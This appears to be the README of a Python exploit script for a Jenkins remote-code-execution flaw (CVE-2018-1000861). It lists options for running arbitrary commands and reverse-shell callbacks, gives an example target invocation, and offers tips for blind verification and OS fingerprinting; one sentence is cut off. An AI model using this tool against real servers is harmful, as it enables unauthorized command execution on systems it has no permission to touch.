Simple script to exploit CVE-2018-1000861, written in Python 3
usage: exploit.py [-h] -u URL [-c CMD] [-r] [-i IP] [-p PORT] [-v]
options:
-h, --help show this help message and exit
-u URL, --url URL Target Jenkins server
-c CMD, --cmd CMD Command to execute
-r, --revshell Execute reverse shell
-i IP, --ip IP IP address for reverse shell callback
-p PORT, --port PORT Port for reverse shell callback
-v, --verbose Verbose output
python exploit.py -u http://192.168.1.20 -c 'ping 192.168.1.10'
- This tool does not attempt to verify the target is vulnerable. All it does is shove a shell command into a Java class.
- Shell commands executed will not return output. You'll need to either have method of verifying the command execute (ie ping + tcpdump) or use a reverse shell
- This vulnerability affects both Linux and Windows installs of Jenkins where the . You should attempt to verify target OS prior to executing this (such as through ICMP TTL or available services)
- The script should work for both Linux and Windows
- reverse shell module (
-r
,-i
,p
options) aren't implemented - Use responsibly
- Platform specific reverse shell modules
- Vuln identification
- Verbosity with vuln identification